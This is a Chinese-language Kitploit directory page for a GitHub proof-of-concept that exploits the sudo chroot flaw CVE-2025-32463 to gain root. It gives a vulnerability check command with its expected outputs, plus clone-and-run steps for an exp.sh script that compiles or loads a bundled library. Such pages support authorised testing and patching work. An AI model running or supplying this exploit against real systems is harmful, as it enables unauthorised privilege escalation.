Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32463_chwoot — 用于CVE-2025-32463 sudo_chwoot的权限提升POC,适配了有gcc编译环境和无gcc编译环境的两种情况,下载运行即可一把梭哈 | Kitploit
工具/GitHubGitHub/yuy0ung/cve-2025-32463_chwoot
权限提升漏洞分析漏洞利用Shellcode渗透测试二进制利用
GitHubyuy0ung/cve-2025-32463_chwoot

CVE-2025-32463_chwoot

用于CVE-2025-32463 sudo_chwoot的权限提升POC,适配了有gcc编译环境和无gcc编译环境的两种情况,下载运行即可一把梭哈

查看仓库
311年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32463_chwoot

English document

声明:本脚本仅用于安全测试,请勿用于非法用途。 CVE-2025-32463 sudo_chwoot权限提升漏洞的验证脚本


介绍 Description

相比于互联网上其他POC,考虑到部分主机并没有安装gcc,缺少编译环境,所以此脚本兼容了两种场景:

  • 主机安装了gcc,脚本会自动编译二进制文件并提权
  • 主机没有安装gcc,脚本会调用编译好的二进制文件提权

使用 Usage

验证漏洞是否存在:

root@kitploit:~
sudo -R woot woot

漏洞存在的结果:

root@kitploit:~
sudo: woot: No such file or directory

漏洞不存在的结果:

root@kitploit:~
sudo: you are not permitted to use the -R option with woot

若漏洞存在,使用POC提权:

root@kitploit:~
git clone https://github.com/Yuy0ung/CVE-2025-32463_chwoot.git
cd CVE-2025-32463_chwoot
chmod +x ./exp.sh
./exp.sh

QQ_1756282169431

文件列表 list

文件内容如下

  • README.md: README文件
  • exp.sh:POC脚本
  • woot1337.so.2:编译好的二进制文件
下载工具